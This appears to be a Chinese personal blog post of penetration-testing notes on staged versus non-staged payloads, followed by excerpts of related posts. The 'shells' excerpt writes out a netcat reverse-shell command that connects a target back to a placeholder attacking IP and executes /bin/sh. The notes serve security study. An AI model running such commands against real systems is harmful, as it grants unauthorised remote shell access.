payloads
发表于|更新于|Network Security
|浏览量:
分阶段与非分阶段有效负载
有效负载是指建立对目标机器的访问(通常通过 shell)的实际代码或可执行文件。主要有两种类型:阶段式和非阶段式。
非分阶段
非分段有效负载一次性发送整个 shellcode 或执行代码。这种类型的有效负载“通常大于”分段有效负载。
上演
分阶段的有效负载是分阶段发送到目标的,而不是一次全部发送。由于代码是以块的形式发送的,因此非分阶段的有效负载往往“不太稳定”。然而,分阶段可能是有利的,因为每个阶段都“较小”,并且在发送到目标时不易被检测到。
奖金:
使用 Metasploit 时,您可以通过有效负载的路径来识别非阶段性有效负载与阶段性负载:
1 | # Non-staged payload: |
[!我以前的笔记(在文本中链接)]
文章作者: xhj
版权声明: 本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 xhj的博客!
相关推荐
2025-05-08
linux-services
启动和停止 Linux 服务Linux 进程 每个进程都有一个由内核根据启动后启动的顺序分配给它们的进程 ID。 系统控制:systemctl 是 Linux 中的一个命令,它允许您与 systemd 交互,当 Linux 机器启动时,该命令(通常)是 PID 1。 systemd 是 Linux 的服务管理器,由于它的 PID 为 1,因此启动后计算机上运行的大多数进程都是 systemd** 的子进程。 因为我们想要在 Linux 上交互或使用的大多数进程都是 systemd 的子进程,所以我们可以使用 systemd 来控制它们。这是因为它们共享相同的命名空间。 要与 systemd 交互,我们必须使用 systemctl 命令。您可以为 systemctl 提供四个选项来管理进程: start:启动一个或多个已经加载到内存中的单元(单元是系统启动和维护所需的对象的封装) stop:停用一个或多个单元 enable:启用一个或多个单元实例 disable:禁用一个或多个单元实例。 在启动时启动进程:要使用 systemctl 在启动时启动特定进程,请使用: 1234sy...
2025-04-07
checklists
外部参与清单检查表对于任何类型的参与都很有用。 外部渗透测试清单基本外部渗透测试清单的示例可能包括: 确保 ROE 已由客户签署 将范围内的 IP 添加到范围选项卡 验证客户范围 发送“启动”电子邮件 进行漏洞扫描 在违规数据库中识别员工的电子邮件/凭证 ID员工电子邮件格式 ID 客户的网站 枚举门户上的所有帐户、密码重置功能等。 扫描网络应用程序(如果存在) 进行手动测试和利用 验证扫描时发现的漏洞 在登录端点/门户上进行密码喷射等 将访问从外部升级到内部 验证之前的发现已得到解决(如果适用) 清理 每个项目都应该有一个地方可以添加注释和状态(即待处理、已完成等)。 您还可以检查范围内的交战规则/资产部分。例如,如果范围内有 10 个 IP 地址,请为每个地址制作一个清单,您可以在其中添加注释并在调查它们时进行标记。 将所有这些内容分组到具有多个选项卡的电子表格中会有所帮助。 [!资源] TCM安全 [!我以前的笔记(在文本中链接)] 你可以在这里找到它们
2025-05-14
ports-and-protocols
常用端口 和协议有 65,535 个端口可用于连接网络上的设备。端口由设备操作系统管理的软件控制。 每个端口都与特定的服务或进程相关联。为了传输数据黑白端口通信端口必须以相同的方式配置。 前约 1000 个端口保留用于特定服务(例如:HTTPS 始终位于端口 443)。其余的可以使用/分配给计算机/程序决定的任何服务。 常用 TCP 端口FTP(文件传输协议)FTP 是分配给端口 21 的 TCP 协议。通过端口 21 访问设备,您可以上传、下载、复制、剪切、粘贴(等)由该设备提供服务的文件。 SSH(安全外壳协议)和 TelnetSSH(端口 22)和 Telnet(端口 23)都是允许远程方连接到设备并在其上执行命令的协议。 Telnet 是两者中较旧的,并且不安全,因为双方之间的所有通信都是以明文形式传递。 SSH 的诞生是为了取代 telnet。通过两台设备之间的 SSH 通信,“已加密”,并且双方在发送/接收数据之前必须“进行身份验证”。 POP3、IMAP、SMTP这三个协议都与email相关。 SMTP(端口 25)负责通过客户端和邮件...
2025-05-20
shells
反向 Shell 与绑定 ShellShell 只是获取和维护对目标计算机的访问权限的一种方式。最常见的 shell 类型是反向 shell,其中受害计算机连接回我们。用于完成 rev-shell 的常用工具是 Netcat。 Rev 贝壳为了使 rev shell 工作,攻击设备需要侦听特定端口上的连接。在 Netcat 中,我们可以使用以下命令告诉设备监听选定的端口:nc -lvp 4444。 -l 用于监听 -v 表示详细 -p 用于端口通过此命令,我们告诉 Netcat 监听我们机器的端口 4444。 在目标上:为了让目标连接到我们的监听器,我们必须在目标上发送执行命令来建立连接。例如:如果目标安装了netcat(或者我们有一些如何将netcat安装到目标机器上),我们可以使用它来连接回我们的机器。 在这种情况下,目标上的命令将如下所示: 1nc <attacking IP> 4444 -e /bin/sh 在此命令中,目标设备上的 nc 创建一个返回攻击 IP 的 TCP 连接,并使用 -e 标志执行 shell (/bin/bash)(该 shell ...
2025-05-10
nessus-vuln-scanning
使用 Nessus 进行漏洞扫描Nessus 是渗透测试中常用的漏洞扫描器。 安装从 https://www.tenable.com/downloads/nessus?loginAttempted=true 下载该工具。使用 /Downloads 文件夹中的 dpkg -i Nessus... 进行安装。安装该工具时,按照终端中的提示操作,您将需要 Nessus Essentials 的激活码: 1234567Unpacking Nessus Scanner Core Components... - You can start Nessus Scanner by typing /bin/systemctl start nessusd.service - Then go to https://kali:8834/ to configure your scanner┌──(hakcypuppy㉿kali)-[~/Downloads]└─$ /bin/systemctl start nessusd.service 点击链接至 https://kali:8834/: 基本网络扫描...
2025-04-10
dev-my-attempt
开发尝试将这些框视为 CTF(而不是实际的渗透测试)。 1.Nmap 侦察123456789101112131415161718sudo nmap -Pn -p- $tStarting Nmap 7.94 ( https://nmap.org ) at 2023-10-09 13:15 EDTNmap scan report for 10.0.2.7Host is up (0.00028s latency).Not shown: 65526 closed tcp ports (reset)PORT STATE SERVICE22/tcp open ssh80/tcp open http111/tcp open rpcbind2049/tcp open nfs8080/tcp open http-proxy36593/tcp open unknown36953/tcp open unknown39333/tcp open unknown51501/tcp open unknownMAC Address: 08:00:27:75:18:...